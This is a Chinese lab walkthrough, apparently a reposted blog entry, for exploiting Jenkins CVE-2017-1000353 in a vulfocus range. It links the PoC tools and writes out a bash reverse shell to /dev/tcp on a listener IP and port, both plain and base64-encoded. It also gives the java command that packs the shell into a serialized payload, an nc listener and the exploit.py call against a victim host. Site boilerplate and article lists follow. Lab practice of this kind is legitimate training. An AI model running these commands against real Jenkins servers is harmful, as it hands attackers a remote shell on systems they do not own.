vulfocus靶场jenkins代码执行漏洞cve-1027-1000353

2024-04-23 15:38:07
开发
30

需要工具：

exploit.py 下载地址：

GitHub - vulhub/CVE-2017-1000353: jenkins CVE-2017-1000353 POC GitCode - 开发者的代码家园https://gitcode.com/vulhub/CVE-2017-1000353/overview?utm_source=csdn_github_accelerator&isLogin=1

生成序列号字符串工具：

GitHub - vulhub/CVE-2017-1000353: jenkins CVE-2017-1000353 POC

https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar

下面反弹shell语句base64编码一下：

bash -i >& /dev/tcp/监听机的IP/端口 0>&1

生成的编码：

生成jenkins_poc.ser命令：

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,上一步生成的base64编码}|{base64,-d}|{bash,-i}"

攻击机监听： nc -lvp 4444

发起攻击代码：

python3 exploit.py http://受害者IP:端口 jenkins_poc.ser

反弹shell成功：

我的

108:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTA1LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTA1LzQ0NDQgMD4mMQ==

105

bash -i >& /dev/tcp/192.168.2.105/4444 0>&1

YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTA1LzQ0NDQgMD4mMQ==

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIuMTA4LzQ0NDQgMD4mMQ==}|{base64,-d}|{bash,-i}"

原文地址:https://blog.csdn.net/qq_27249127/article/details/138116670 本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：https://www.suanlizi.com/kf/1782675301122314240.html 如若内容造成侵权/违法违规/事实不符，请联系《酸梨子》网邮箱：1419361763@qq.com进行投诉反馈，一经查实，立即删除！

阅读全部

最近更新

题解 - 序列

2024-04-23 15:38:07 116 阅读
CST热仿真案例——电动车直流快充Cable热仿真

2024-04-23 15:38:07 102 阅读
docker php8.1+nginx base 镜像 dockerfile 配置

2024-04-23 15:38:07 94 阅读
Could not load dynamic library ‘cudart64_100.dll‘

2024-04-23 15:38:07 100 阅读
NoSQL之Redis非关系型数据库

2024-04-23 15:38:07 101 阅读
2024.7.22 作业

2024-04-23 15:38:07 97 阅读
GDB调试正在运行的程序

2024-04-23 15:38:07 81 阅读
昇思25天学习打卡营第18天| DCGAN生成漫画头像

2024-04-23 15:38:07 85 阅读
在Django里面运行非项目文件

2024-04-23 15:38:07 82 阅读
SSD基本架构与工作原理

2024-04-23 15:38:07 87 阅读
在誉天学习完HCIE就业吗？

2024-04-23 15:38:07 94 阅读
【合同专题】合同终止协议书、项目合作协议、交底纪要、管理台账

2024-04-23 15:38:07 84 阅读
驾驭云原生日志洪流：高效分析与管理的策略集

2024-04-23 15:38:07 85 阅读
go 协程池的实现

2024-04-23 15:38:07 88 阅读
Shell脚本循环语句与函数

2024-04-23 15:38:07 89 阅读
连锁店收银系统源码（收银称重pos+聚合支付+ERP进销存+营销+会员管理）

2024-04-23 15:38:07 93 阅读
TIA博途V19无法勾选来自远程对象的PUT/GET访问的解决办法

2024-04-23 15:38:07 85 阅读
四大引用——强软弱虚

2024-04-23 15:38:07 86 阅读
Python语言-面向对象

2024-04-23 15:38:07 91 阅读
如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

2024-04-23 15:38:07 85 阅读
网站安全-CDN篇

2024-04-23 15:38:07 88 阅读

热门阅读

最大层内元素和

2024-04-23 15:38:07 35 阅读
芋道 SpringCloud微服务框架运行，内含步骤

2024-04-23 15:38:07 35 阅读
python画图笔记

2024-04-23 15:38:07 39 阅读
FPGA_verilog语法整理

2024-04-23 15:38:07 39 阅读
斯特林制冷机技术成熟应用广泛全球市场不断增长

2024-04-23 15:38:07 34 阅读
python——井字棋游戏——登入注册界面

2024-04-23 15:38:07 27 阅读
浏览器渲染流程中的 9 个面试点

2024-04-23 15:38:07 36 阅读
python 文件打包(使用pyinstaller)

2024-04-23 15:38:07 42 阅读
LLM学习之自然语言处理简单叙述

2024-04-23 15:38:07 37 阅读
新手学习C++常去的网站！

2024-04-23 15:38:07 33 阅读
简单了解Element Plus

2024-04-23 15:38:07 47 阅读
第20篇 Vue命令简介

2024-04-23 15:38:07 27 阅读
idea中搜索不到仓库中的jar包解决方法

2024-04-23 15:38:07 40 阅读
win32使用现代样式的公共控件

2024-04-23 15:38:07 35 阅读
CSS3多列（详解网页多列布局应用）

2024-04-23 15:38:07 31 阅读
ChatGPT助力测试领域！探索人工智能编写测试用例的新前景

2024-04-23 15:38:07 35 阅读
你们项目日志是如何处理的？？？

2024-04-23 15:38:07 41 阅读
嵌入式系统的基本介绍

2024-04-23 15:38:07 37 阅读
Mysql学习一

2024-04-23 15:38:07 30 阅读
贪心算法在找零问题中的应用

2024-04-23 15:38:07 35 阅读
Python可视化

2024-04-23 15:38:07 37 阅读
基于Echarts的超市销售可视化分析系统（数据+程序＋论文）

2024-04-23 15:38:07 28 阅读
2024年【北京市安全员-B证】考试题及北京市安全员-B证考试试卷

2024-04-23 15:38:07 31 阅读
$汇编指令入门$

汇编指令入门

2024-04-23 15:38:07 35 阅读
计算机工作者学习平台

2024-04-23 15:38:07 32 阅读
vite-electron 静默打印功能实现

2024-04-23 15:38:07 35 阅读
一句话木马

2024-04-23 15:38:07 35 阅读
dicom图像中灰度图像可以调整窗宽、窗位，RGB图像调整亮度或对比度？

2024-04-23 15:38:07 34 阅读
真有立即做出40+BI零售数据分析报表的方案？

2024-04-23 15:38:07 34 阅读
设计模式之责任链模式(二): 实现方式

2024-04-23 15:38:07 36 阅读